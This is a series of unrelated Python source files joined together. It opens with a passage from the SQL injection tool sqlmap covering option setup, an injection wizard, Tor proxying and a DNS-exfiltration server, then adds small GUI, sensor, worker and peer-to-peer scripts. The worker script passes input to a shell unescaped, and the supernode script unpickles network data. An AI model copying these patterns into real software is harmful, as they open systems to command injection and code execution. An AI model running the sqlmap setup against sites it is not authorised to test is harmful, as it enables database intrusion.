kb.singleLogFlags = set()
kb.skipSeqMatcher = False
kb.reduceTests = None
kb.tlsSNI = {}
kb.stickyDBMS = False
kb.stickyLevel = None
kb.storeCrawlingChoice = None
kb.storeHashesChoice = None
kb.suppressResumeInfo = False
kb.tableFrom = None
kb.technique = None
kb.tempDir = None
kb.testMode = False
kb.testOnlyCustom = False
kb.testQueryCount = 0
kb.testType = None
kb.threadContinue = True
kb.threadException = False
kb.tableExistsChoice = None
kb.uChar = NULL
kb.unionDuplicates = False
kb.xpCmdshellAvailable = False
if flushAll:
kb.headerPaths = {}
kb.keywords = set(getFileItems(paths.SQL_KEYWORDS))
kb.passwordMgr = None
kb.skipVulnHost = None
kb.tamperFunctions = []
kb.targets = oset()
kb.testedParams = set()
kb.userAgents = None
kb.vainRun = True
kb.vulnHosts = set()
kb.wafFunctions = []
kb.wordlists = None
def _useWizardInterface():
"""
Presents simple wizard interface for beginner users
"""
if not conf.wizard:
return
logger.info("starting wizard interface")
while not conf.url:
message = "Please enter full target URL (-u): "
conf.url = readInput(message, default=None)
message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
conf.data = readInput(message, default=None)
if not (filter(lambda _: '=' in unicode(_), (conf.url, conf.data)) or '*' in conf.url):
warnMsg = "no GET and/or %s parameter(s) found for testing " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
warnMsg += "(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). "
if not conf.crawlDepth and not conf.forms:
warnMsg += "Will search for forms"
conf.forms = True
logger.warn(warnMsg)
choice = None
while choice is None or choice not in ("", "1", "2", "3"):
message = "Injection difficulty (--level/--risk). Please choose:\n"
message += "[1] Normal (default)\n[2] Medium\n[3] Hard"
choice = readInput(message, default='1')
if choice == '2':
conf.risk = 2
conf.level = 3
elif choice == '3':
conf.risk = 3
conf.level = 5
else:
conf.risk = 1
conf.level = 1
if not conf.getAll:
choice = None
while choice is None or choice not in ("", "1", "2", "3"):
message = "Enumeration (--banner/--current-user/etc). Please choose:\n"
message += "[1] Basic (default)\n[2] Intermediate\n[3] All"
choice = readInput(message, default='1')
if choice == '2':
map(lambda x: conf.__setitem__(x, True), WIZARD.INTERMEDIATE)
elif choice == '3':
map(lambda x: conf.__setitem__(x, True), WIZARD.ALL)
else:
map(lambda x: conf.__setitem__(x, True), WIZARD.BASIC)
logger.debug("muting sqlmap.. it will do the magic for you")
conf.verbose = 0
conf.batch = True
conf.threads = 4
dataToStdout("\nsqlmap is running, please wait..\n\n")
def _saveConfig():
"""
Saves the command line options to a sqlmap configuration INI file
Format.
"""
if not conf.saveConfig:
return
debugMsg = "saving command line options to a sqlmap configuration INI file"
logger.debug(debugMsg)
saveConfig(conf, conf.saveConfig)
infoMsg = "saved command line options to the configuration file '%s'" % conf.saveConfig
logger.info(infoMsg)
def setVerbosity():
"""
This function set the verbosity of sqlmap output messages.
"""
if conf.verbose is None:
conf.verbose = 1
conf.verbose = int(conf.verbose)
if conf.verbose == 0:
logger.setLevel(logging.ERROR)
elif conf.verbose == 1:
logger.setLevel(logging.INFO)
elif conf.verbose > 2 and conf.eta:
conf.verbose = 2
logger.setLevel(logging.DEBUG)
elif conf.verbose == 2:
logger.setLevel(logging.DEBUG)
elif conf.verbose == 3:
logger.setLevel(CUSTOM_LOGGING.PAYLOAD)
elif conf.verbose == 4:
logger.setLevel(CUSTOM_LOGGING.TRAFFIC_OUT)
elif conf.verbose >= 5:
logger.setLevel(CUSTOM_LOGGING.TRAFFIC_IN)
def _normalizeOptions(inputOptions):
"""
Sets proper option types
"""
types_ = {}
for group in optDict.keys():
types_.update(optDict[group])
for key in inputOptions:
if key in types_:
value = inputOptions[key]
if value is None:
continue
type_ = types_[key]
if type_ and isinstance(type_, tuple):
type_ = type_[0]
if type_ == OPTION_TYPE.BOOLEAN:
try:
value = bool(value)
except (TypeError, ValueError):
value = False
elif type_ == OPTION_TYPE.INTEGER:
try:
value = int(value)
except (TypeError, ValueError):
value = 0
elif type_ == OPTION_TYPE.FLOAT:
try:
value = float(value)
except (TypeError, ValueError):
value = 0.0
inputOptions[key] = value
def _mergeOptions(inputOptions, overrideOptions):
"""
Merge command line options with configuration file and default options.
@param inputOptions: optparse object with command line options.
@type inputOptions: C{instance}
"""
if inputOptions.configFile:
configFileParser(inputOptions.configFile)
if hasattr(inputOptions, "items"):
inputOptionsItems = inputOptions.items()
else:
inputOptionsItems = inputOptions.__dict__.items()
for key, value in inputOptionsItems:
if key not in conf or value not in (None, False) or overrideOptions:
conf[key] = value
if not conf.api:
for key, value in conf.items():
if value is not None:
kb.explicitSettings.add(key)
for key, value in defaults.items():
if hasattr(conf, key) and conf[key] is None:
conf[key] = value
lut = {}
for group in optDict.keys():
lut.update((_.upper(), _) for _ in optDict[group])
envOptions = {}
for key, value in os.environ.items():
if key.upper().startswith(SQLMAP_ENVIRONMENT_PREFIX):
_ = key[len(SQLMAP_ENVIRONMENT_PREFIX):].upper()
if _ in lut:
envOptions[lut[_]] = value
if envOptions:
_normalizeOptions(envOptions)
for key, value in envOptions.items():
conf[key] = value
mergedOptions.update(conf)
def _setTrafficOutputFP():
if conf.trafficFile:
infoMsg = "setting file for logging HTTP traffic"
logger.info(infoMsg)
conf.trafficFP = openFile(conf.trafficFile, "w+")
def _setDNSServer():
if not conf.dnsDomain:
return
infoMsg = "setting up DNS server instance"
logger.info(infoMsg)
isAdmin = runningAsAdmin()
if isAdmin:
try:
conf.dnsServer = DNSServer()
conf.dnsServer.run()
except socket.error, msg:
errMsg = "there was an error while setting up "
errMsg += "DNS server instance ('%s')" % msg
raise SqlmapGenericException(errMsg)
else:
errMsg = "you need to run sqlmap as an administrator "
errMsg += "if you want to perform a DNS data exfiltration attack "
errMsg += "as it will need to listen on privileged UDP port 53 "
errMsg += "for incoming address resolution attempts"
raise SqlmapMissingPrivileges(errMsg)
def _setProxyList():
if not conf.proxyFile:
return
conf.proxyList = []
for match in re.finditer(r"(?i)((http[^:]*|socks[^:]*)://)?([\w\-.]+):(\d+)", readCachedFileContent(conf.proxyFile)):
_, type_, address, port = match.groups()
conf.proxyList.append("%s://%s:%s" % (type_ or "http", address, port))
def _setTorProxySettings():
if not conf.tor:
return
if conf.torType == PROXY_TYPE.HTTP:
_setTorHttpProxySettings()
else:
_setTorSocksProxySettings()
def _setTorHttpProxySettings():
infoMsg = "setting Tor HTTP proxy settings"
logger.info(infoMsg)
port = findLocalPort(DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,))
if port:
conf.proxy = "http://%s:%d" % (LOCALHOST, port)
else:
errMsg = "can't establish connection with the Tor HTTP proxy. "
errMsg += "Please make sure that you have Tor (bundle) installed and setup "
errMsg += "so you could be able to successfully use switch '--tor' "
raise SqlmapConnectionException(errMsg)
if not conf.checkTor:
warnMsg = "use switch '--check-tor' at "
warnMsg += "your own convenience when accessing "
warnMsg += "Tor anonymizing network because of "
warnMsg += "known issues with default settings of various 'bundles' "
warnMsg += "(e.g. Vidalia)"
logger.warn(warnMsg)
def _setTorSocksProxySettings():
infoMsg = "setting Tor SOCKS proxy settings"
logger.info(infoMsg)
port = findLocalPort(DEFAULT_TOR_SOCKS_PORTS if not conf.torPort else (conf.torPort,))
if not port:
errMsg = "can't establish connection with the Tor SOCKS proxy. "
errMsg += "Please make sure that you have Tor service installed and setup "
errMsg += "so you could be able to successfully use switch '--tor' "
raise SqlmapConnectionException(errMsg)
# SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29)
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, port)
socks.wrapmodule(urllib2)
def _checkWebSocket():
if conf.url and (conf.url.startswith("ws:/") or conf.url.startswith("wss:/")):
try:
from websocket import ABNF
except ImportError:
errMsg = "sqlmap requires third-party module 'websocket-client' "
errMsg += "in order to use WebSocket funcionality"
raise SqlmapMissingDependence(errMsg)
def _checkTor():
if not conf.checkTor:
return
infoMsg = "checking Tor connection"
logger.info(infoMsg)
try:
page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False)
except SqlmapConnectionException:
page = None
if not page or 'Congratulations' not in page:
errMsg = "it appears that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'"
raise SqlmapConnectionException(errMsg)
else:
infoMsg = "Tor is properly being used"
logger.info(infoMsg)
def _basicOptionValidation():
if conf.limitStart is not None and not (isinstance(conf.limitStart, int) and conf.limitStart > 0):
errMsg = "value for option '--start' (limitStart) must be an integer value greater than zero (>0)"
raise SqlmapSyntaxException(errMsg)
if conf.limitStop is not None and not (isinstance(conf.limitStop, int) and conf.limitStop > 0):
errMsg = "value for option '--stop' (limitStop) must be an integer value greater than zero (>0)"
raise SqlmapSyntaxException(errMsg)
if conf.level is not None and not (isinstance(conf.level, int) and conf.level >= 1 and conf.level <= 5):
errMsg = "value for option '--level' must be an integer value from range [1, 5]"
raise SqlmapSyntaxException(errMsg)
if conf.risk is not None and not (isinstance(conf.risk, int) and conf.risk >= 1 and conf.risk <= 3):
errMsg = "value for option '--risk' must be an integer value from range [1, 3]"
raise SqlmapSyntaxException(errMsg)
if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \
isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart:
errMsg = "value for option '--start' (limitStart) must be smaller or equal than value for --stop (limitStop) option"
raise SqlmapSyntaxException(errMsg)
if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \
isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar:
errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option"
raise SqlmapSyntaxException(errMsg)
if conf.textOnly and conf.nullConnection:
errMsg = "switch '--text-only' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
if conf.eta and conf.verbose > defaults.verbose:
errMsg = "switch '--eta' is incompatible with option '-v'"
raise SqlmapSyntaxException(errMsg)
if conf.direct and conf.url:
errMsg = "option '-d' is incompatible with option '-u' ('--url')"
raise SqlmapSyntaxException(errMsg)
if conf.identifyWaf and conf.skipWaf:
errMsg = "switch '--identify-waf' is incompatible with switch '--skip-waf'"
raise SqlmapSyntaxException(errMsg)
if conf.titles and conf.nullConnection:
errMsg = "switch '--titles' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
if conf.dumpTable and conf.search:
errMsg = "switch '--dump' is incompatible with switch '--search'"
raise SqlmapSyntaxException(errMsg)
if conf.api and not conf.configFile:
errMsg = "switch '--api' requires usage of option '-c'"
raise SqlmapSyntaxException(errMsg)
if conf.data and conf.nullConnection:
errMsg = "option '--data' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
if conf.string and conf.nullConnection:
errMsg = "option '--string' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
if conf.notString and conf.nullConnection:
errMsg = "option '--not-string' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
if conf.noCast and conf.hexConvert:
errMsg = "switch '--no-cast' is incompatible with switch '--hex'"
raise SqlmapSyntaxException(errMsg)
if conf.dumpAll and conf.search:
errMsg = "switch '--dump-all' is incompatible with switch '--search'"
raise SqlmapSyntaxException(errMsg)
if conf.string and conf.notString:
errMsg = "option '--string' is incompatible with switch '--not-string'"
raise SqlmapSyntaxException(errMsg)
if conf.regexp and conf.nullConnection:
errMsg = "option '--regexp' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
if conf.regexp:
try:
re.compile(conf.regexp)
except Exception, ex:
errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, getSafeExString(ex))
raise SqlmapSyntaxException(errMsg)
if conf.crawlExclude:
try:
re.compile(conf.crawlExclude)
except Exception, ex:
errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, getSafeExString(ex))
raise SqlmapSyntaxException(errMsg)
if conf.dumpTable and conf.dumpAll:
errMsg = "switch '--dump' is incompatible with switch '--dump-all'"
raise SqlmapSyntaxException(errMsg)
if conf.predictOutput and (conf.threads > 1 or conf.optimize):
errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'"
raise SqlmapSyntaxException(errMsg)
if conf.threads > MAX_NUMBER_OF_THREADS and not conf.get("skipThreadCheck"):
errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
raise SqlmapSyntaxException(errMsg)
if conf.forms and not any((conf.url, conf.googleDork, conf.bulkFile, conf.sitemapUrl)):
errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g', '-m' or '-x'"
raise SqlmapSyntaxException(errMsg)
if conf.crawlExclude and not conf.crawlDepth:
errMsg = "option '--crawl-exclude' requires usage of switch '--crawl'"
raise SqlmapSyntaxException(errMsg)
if conf.safePost and not conf.safeUrl:
errMsg = "option '--safe-post' requires usage of option '--safe-url'"
raise SqlmapSyntaxException(errMsg)
if conf.safeFreq and not any((conf.safeUrl, conf.safeReqFile)):
errMsg = "option '--safe-freq' requires usage of option '--safe-url' or '--safe-req'"
raise SqlmapSyntaxException(errMsg)
if conf.safeReqFile and any((conf.safeUrl, conf.safePost)):
errMsg = "option '--safe-req' is incompatible with option '--safe-url' and option '--safe-post'"
raise SqlmapSyntaxException(errMsg)
if conf.csrfUrl and not conf.csrfToken:
errMsg = "option '--csrf-url' requires usage of option '--csrf-token'"
raise SqlmapSyntaxException(errMsg)
if conf.csrfToken and conf.threads > 1:
errMsg = "option '--csrf-url' is incompatible with option '--threads'"
raise SqlmapSyntaxException(errMsg)
if conf.requestFile and conf.url and conf.url != DUMMY_URL:
errMsg = "option '-r' is incompatible with option '-u' ('--url')"
raise SqlmapSyntaxException(errMsg)
if conf.direct and conf.proxy:
errMsg = "option '-d' is incompatible with option '--proxy'"
raise SqlmapSyntaxException(errMsg)
if conf.direct and conf.tor:
errMsg = "option '-d' is incompatible with switch '--tor'"
raise SqlmapSyntaxException(errMsg)
if not conf.tech:
errMsg = "option '--technique' can't be empty"
raise SqlmapSyntaxException(errMsg)
if conf.tor and conf.ignoreProxy:
errMsg = "switch '--tor' is incompatible with switch '--ignore-proxy'"
raise SqlmapSyntaxException(errMsg)
if conf.tor and conf.proxy:
errMsg = "switch '--tor' is incompatible with option '--proxy'"
raise SqlmapSyntaxException(errMsg)
if conf.proxy and conf.proxyFile:
errMsg = "switch '--proxy' is incompatible with option '--proxy-file'"
raise SqlmapSyntaxException(errMsg)
if conf.checkTor and not any((conf.tor, conf.proxy)):
errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)"
raise SqlmapSyntaxException(errMsg)
if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535):
errMsg = "value for option '--tor-port' must be in range 0-65535"
raise SqlmapSyntaxException(errMsg)
if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True):
errMsg = "option '--tor-type' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(PROXY_TYPE, True))
raise SqlmapSyntaxException(errMsg)
if conf.dumpFormat not in getPublicTypeMembers(DUMP_FORMAT, True):
errMsg = "option '--dump-format' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(DUMP_FORMAT, True))
raise SqlmapSyntaxException(errMsg)
if conf.skip and conf.testParameter:
errMsg = "option '--skip' is incompatible with option '-p'"
raise SqlmapSyntaxException(errMsg)
if conf.mobile and conf.agent:
errMsg = "switch '--mobile' is incompatible with option '--user-agent'"
raise SqlmapSyntaxException(errMsg)
if conf.proxy and conf.ignoreProxy:
errMsg = "option '--proxy' is incompatible with switch '--ignore-proxy'"
raise SqlmapSyntaxException(errMsg)
if conf.timeSec < 1:
errMsg = "value for option '--time-sec' must be a positive integer"
raise SqlmapSyntaxException(errMsg)
if conf.uChar and not re.match(UNION_CHAR_REGEX, conf.uChar):
errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 1)"
raise SqlmapSyntaxException(errMsg)
if isinstance(conf.uCols, basestring):
if not conf.uCols.isdigit() and ("-" not in conf.uCols or len(conf.uCols.split("-")) != 2):
errMsg = "value for option '--union-cols' must be a range with hyphon "
errMsg += "(e.g. 1-10) or integer value (e.g. 5)"
raise SqlmapSyntaxException(errMsg)
if conf.dbmsCred and ':' not in conf.dbmsCred:
errMsg = "value for option '--dbms-cred' must be in "
errMsg += "format <username>:<password> (e.g. \"root:pass\")"
raise SqlmapSyntaxException(errMsg)
if conf.charset:
_ = checkCharEncoding(conf.charset, False)
if _ is None:
errMsg = "unknown charset '%s'. Please visit " % conf.charset
errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE
errMsg += "supported charsets"
raise SqlmapSyntaxException(errMsg)
else:
conf.charset = _
if conf.loadCookies:
if not os.path.exists(conf.loadCookies):
errMsg = "cookies file '%s' does not exist" % conf.loadCookies
raise SqlmapFilePathException(errMsg)
def _resolveCrossReferences():
lib.core.threads.readInput = readInput
lib.core.common.getPageTemplate = getPageTemplate
lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage
lib.request.connect.setHTTPHandlers = _setHTTPHandlers
lib.utils.search.setHTTPHandlers = _setHTTPHandlers
lib.controller.checks.setVerbosity = setVerbosity
lib.controller.checks.setWafFunctions = _setWafFunctions
def initOptions(inputOptions=AttribDict(), overrideOptions=False):
_setConfAttributes()
_setKnowledgeBaseAttributes()
_mergeOptions(inputOptions, overrideOptions)
def init():
"""
Set attributes into both configuration and knowledge base singletons
based upon command line and configuration file options.
"""
_useWizardInterface()
setVerbosity()
_saveConfig()
_setRequestFromFile()
_cleanupOptions()
_cleanupEnvironment()
_dirtyPatches()
_purgeOutput()
_checkDependencies()
_createTemporaryDirectory()
_basicOptionValidation()
_setProxyList()
_setTorProxySettings()
_setDNSServer()
_adjustLoggingFormatter()
_setMultipleTargets()
_setTamperingFunctions()
_setWafFunctions()
_setTrafficOutputFP()
_resolveCrossReferences()
_checkWebSocket()
parseTargetUrl()
parseTargetDirect()
if any((conf.url, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.requestFile, conf.googleDork, conf.liveTest)):
_setHTTPTimeout()
_setHTTPExtraHeaders()
_setHTTPCookies()
_setHTTPReferer()
_setHTTPHost()
_setHTTPUserAgent()
_setHTTPAuthentication()
_setHTTPHandlers()
_setDNSCache()
_setSocketPreConnect()
_setSafeVisit()
_doSearch()
_setBulkMultipleTargets()
_setSitemapTargets()
_checkTor()
_setCrawler()
_findPageForms()
_setDBMS()
_setTechnique()
_setThreads()
_setOS()
_setWriteFile()
_setMetasploit()
_setDBMSAuthentication()
loadBoundaries()
loadPayloads()
_setPrefixSuffix()
update()
_loadQueries()
|
progressbar.py | """
Reference:
tkinter_progress.py
https://gist.github.com/MattWoodhead/c7c51cd2beaea33e1b8f5057f7a7d78a
"""
import threading
import tkinter as tk
from tkinter import ttk
class ProgressBar():
""" threaded progress bar for tkinter gui"""
def __init__(self, parent, row, column, columnspan):
self.maximum = 100
self.interval = 10
self.progressbar = ttk.Progressbar(parent,
orient=tk.HORIZONTAL,
mode="indeterminate",
maximum=self.maximum)
self.progressbar.grid(row=row, column=column,
columnspan=columnspan, sticky="we")
self.thread = threading.Thread(
target=self.progressbar.start(self.interval), args=())
self.thread.start()
def start_progressbar(self):
if not self.thread.isAlive():
v = self.progressbar["value"]
self.progressbar.configure(mode="indeterminate",
maximum=self.maximum,
value=v)
self.progressbar.start()
def stop_progressbar(self):
if not self.thread.isAlive():
v = self.progressbar["value"]
self.progressbar.stop()
self.progressbar["value"] = v
def clear_progressbar(self):
if not self.thread.isAlive():
self.progressbar.stop()
self.progressbar.configure(mode="determinate", value=0)
def complete_progressbar(self):
if not self.thread.isAlive():
self.progressbar.stop()
self.progressbar.configure(mode="determinate",
maximum=self.maximum,
value=self.maximum)
def print_message():
print("proof a separate thread is running")
class AppGUI(tk.Frame):
"""class to define tkinter GUI"""
def __init__(self, parent):
super(AppGUI, self).__init__(master=parent)
progressbar = ProgressBar(parent, row=0, column=0, columnspan=2)
start_button = ttk.Button(
parent, text="start", command=progressbar.start_progressbar)
start_button.grid(row=1, column=0)
stop_button = ttk.Button(
parent, text="stop", command=progressbar.stop_progressbar)
stop_button.grid(row=1, column=1)
complete_button = ttk.Button(
parent, text="complete", command=progressbar.complete_progressbar)
complete_button.grid(row=2, column=0)
clear_button = ttk.Button(
parent, text="clear", command=progressbar.clear_progressbar)
clear_button.grid(row=2, column=1)
test_print_button = ttk.Button(
parent, text="thread test", command=print_message)
test_print_button.grid(row=3, column=0, columnspan=2, sticky="we")
def main():
root = tk.Tk()
app = AppGUI(root)
root.mainloop()
if __name__ == '__main__':
main()
|
seismograph.py | #!/usr/bin/env python3
import os
import time
import sys
try:
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
except ImportError:
print("""This example requires PIL.
Install with: sudo apt install python{v}-pil
""".format(v="" if sys.version_info.major == 2 else sys.version_info.major))
sys.exit(1)
from lsm303d import LSM303D
from threading import Thread
from luma.core.interface.serial import spi
from luma.core.render import canvas
from luma.oled.device import sh1106
print("""This Pimoroni Breakout Garden example requires an
LSM303D 6DoF Breakout and a 1.12" OLED Breakout (SPI).
The Dino-Detect v1.2 beta is a dino stomp detector. It's a
UNIX system, I know this.
Press Ctrl+C to exit.
""")
# Set up OLED
oled = sh1106(spi(port=0, device=1, gpio_DC=9), rotate=2, height=128, width=128)
# Load fonts
rr_path = os.path.abspath(os.path.join(os.path.dirname(__file__), 'fonts', 'Roboto-Regular.ttf'))
print(rr_path)
rb_path = os.path.abspath(os.path.join(os.path.dirname(__file__), 'fonts', 'Roboto-Black.ttf'))
rr_24 = ImageFont.truetype(rr_path, 24)
rb_20 = ImageFont.truetype(rb_path, 20)
rr_12 = ImageFont.truetype(rr_path, 12)
# Set up LSM303D motion sensor
lsm = LSM303D(0x1d)
samples = []
points = []
sx, sy, sz = lsm.accelerometer() # Starting values to zero out accelerometer
sensitivity = 5 # Value from 1 to 10. Determines twitchiness of needle
# Function to thread accelerometer values separately to OLED drawing
def sample():
while True:
x, y, z = lsm.accelerometer()
x -= sx
y -= sy
z -= sz
v = y # Change this axis depending on orientation of breakout
# Scale up or down depending on sensitivity required
if v < 0:
v *= (100 * sensitivity)
else:
v *= (40 * sensitivity)
# Only keep 96 most recent values in list
points.append(v)
if len(points) > 96:
points.pop(0)
time.sleep(0.05)
# The thread to measure acclerometer values
t = Thread(target=sample)
t.daemon = True
t.start()
# Wait for at least one data oint
while len(points) == 0:
pass
# The main loop that draws values to the OLED
while True:
background = Image.open("images/seismograph.png").convert(oled.mode)
draw = ImageDraw.ImageDraw(background)
draw.line([(128, 64), (96, 64 + points[-1])], fill="white")
draw.line([(128, 63), (96, 64 + points[-1])], fill="white")
draw.line([(128, 65), (96, 64 + points[-1])], fill="white")
# Draw the seismograph trace
for i in range(1, len(points)):
draw.line([(i - 1, 64 + points[i - 1]), (i, 64 + points[i])], fill="white")
# Draw the Dino-Detect "branding"
draw.rectangle([(0, 0), (128, 20)], fill="black")
draw.text((0, 1), "AUS (A UNIX System)", fill="white", font=rr_12)
draw.line([(0, 20), (128, 20)], fill="white")
draw.rectangle([(0, 108), (128, 128)], fill="black")
draw.text((0, 110), "Dino-Detect v1.2 BETA", fill="white", font=rr_12)
draw.line([(0, 108), (128, 108)], fill="white")
# Display on the OLED
oled.display(background)
|
model_workers.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Start workers to create model for all categories."""
import time
import argparse
import threading
from subprocess import call
from unidecode import unidecode
from caterpy.url_lists import return_url_lists
def return_args():
"""Get some args to start update classifiers."""
_parser = argparse.ArgumentParser(add_help=True, description=(
"Get some args to pass to update_classifiers script."))
_parser.add_argument("-c", "--category", action="store", default="all",
help="Pass category, url or all categories.")
_parser.add_argument("-u", "--unknow", action="store_true", default=False,
help="Get word from unknow urls into url parsed.")
_parser.add_argument("-e", "--english", action="store_true",
default=False, help="Save only words in english.")
return _parser.parse_args()
def worker_cat(cat, en, unknow):
call(["/usr/bin/python3 update_classifiers.py -c {} {} {}".format(
cat, en, unknow)], shell=True)
if __name__ == "__main__":
opts = return_args()
url_lists = return_url_lists()
if opts.category == "all":
cats = set([c for c in url_lists])
elif opts.category.startswith('http'):
cats = set([opts.category])
else:
cats = set([c for c in url_lists if unidecode(c) == unidecode(
opts.category)])
if opts.english:
en = "-e"
else:
en = ""
if opts.unknow:
unknow = "-u"
else:
unknow = ""
while len(cats) != 0:
if threading.active_count() > 10:
time.sleep(30)
else:
cat = cats.pop()
start_worker = threading.Thread(
target=worker_cat, args=[cat, en, unknow])
start_worker.start()
|
supernode.py | # broadcasting port number : 44444
# livestatus port number : 12121
# handleFile() sharing port : 9005
# supernode to supernode communication PORT : 9999
# showFile : 9001
# findFile : 9002, 9003
# reqHandler : 9090
# add superNode broadcast req : 11000
# superNode file update info : 11001
# ACK to supernode for assigning SuperNode 8090
# superNode to supernode file info sharing(first time only) : 11002
import socket
import subprocess
import threading
import os
import time
import pickle
from collections import defaultdict
#PORT Mappings
PORT_updateSuperNode = 11001
PORT_superNodeFileCache = 11002
PORT_sync = 9191
myIPAddr = ""
# containing objects of Node
childNodes = {} #{IPAddr->Node}
fileCache = defaultdict(list) #{fileName -> [IPAddr,...]}
superNodeList = []
def myIP():
global myIPAddr
bashCommand = 'hostname -I | awk \'{print $1}\''
IPAddr = subprocess.check_output(['bash','-c', bashCommand])
myIPAddr = IPAddr.strip('\n')
# ---------------------Inter Super node communication---------------------
def recvFileCache():
print ("----inside recv file cache---")
global fileCache
tempCache = recvObj(PORT_superNodeFileCache, 10)
if len(fileCache)==0 and tempCache is not None:
print tempCache
fileCache = tempCache
def sendFileCache(ipAddr):
sendObj(PORT_superNodeFileCache, ipAddr, fileCache)
# run on a thread to alter the supernode list
def setSuperNodes():
getSuperNodes1()
# accept requests to become superNode
sNode = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
sNode.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sNode.bind(("", 11000))
while True:
# continuously listen for broadcast msgs
data, addr = sNode.recvfrom(5096)
if data != '':
if addr[0] not in superNodeList and addr[0]!= myIPAddr:
print "New Connected SuperNode :-"+addr[0]+"-"
getSuperNodes2(addr[0])
superNodeList.append(addr[0])
# send a broadcast message once to add your ip to all other supernodes.
def getSuperNodes1():
broadcast = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
broadcast.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# Set a timeout so the socket does not block
# indefinitely when trying to receive data.
broadcast.settimeout(5)
broadcast.bind(("", 44444))
message = "I'm a superNode"
broadcast.sendto(message, ('<broadcast>', 11000))
broadcast.close()
sNode = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
sNode.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sNode.bind(("", 11000))
sNode.settimeout(2)
tempaddr = ""
try:
data, addr = sNode.recvfrom(5096)
tempaddr = addr[0]
if data != '':
if addr[0] not in superNodeList and addr[0]!= myIPAddr:
print "New Connected SuperNode2 :-"+addr[0]+"-"
superNodeList.append(addr[0])
except socket.error, exc:
print "Some Error in Supernode 1",exc
sNode.close()
#sync messages
TCP_IP = tempaddr
TCP_PORT = PORT_sync
BUFFER_SIZE = 5096
p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
p.connect((str(TCP_IP), TCP_PORT))
p.send("hola, amoebas!")
p.close()
except socket.error , exc:
print "Error Caught : ",exc
recvFileCache()
print("________________cache after rec cache________________")
print(fileCache)
print("______________________________________________________")
def getSuperNodes2(addr):
broadcast = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
broadcast.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# Set a timeout so the socket does not block
# indefinitely when trying to receive data.
broadcast.settimeout(5)
broadcast.bind(("", 44444))
message = "I'm a superNode"
broadcast.sendto(message, ('<broadcast>', 11000))
broadcast.close()
# time.sleep(4)
#sync messages
TCP_IP = myIPAddr
TCP_PORT = PORT_sync
BUFFER_SIZE = 5096
tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
tcpsock.bind((TCP_IP, TCP_PORT))
# tcpsock.settimeout(tout)
try:
tcpsock.listen(5)
(conn, (ip, port)) = tcpsock.accept()
msg = conn.recv(5096)
tcpsock.close()
except socket.error as e:
print "files addition socket timeout : " + TCP_IP
tcpsock.close()
return
tcpsock.close()
sendFileCache(addr)
print("------------------cache after send file------------")
print(fileCache)
print("________________________________________________")
# continuously listen for updates regarding the files meta information
# maintain same set of file information across all superNodes.
def getUpdates():
BUFFER_SIZE = 5096
tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print("---------in get Update s->>>>>>>>"+str(myIPAddr)+"<<<<<<<,,")
tcpsock.bind((myIPAddr, PORT_updateSuperNode))
while True:
tcpsock.listen(5)
print "----update superNode waiting=--------"
(conn, (ip,port)) = tcpsock.accept()
print 'Got connection from ', (ip,port)
data, addr = conn.recvfrom(5096)
if data !='':
print "---------------------updating superNode -------------------"
print data
msg = pickle.loads(data)
for x in msg:
print x
if(x[5] == "add"):
print "adding files -->"+ myIPAddr +"-->fileName-->"+ x[0]
childNodes[myIPAddr].fileMap[x[0]] = File(x[0], x[1], x[2], x[3], x[4])
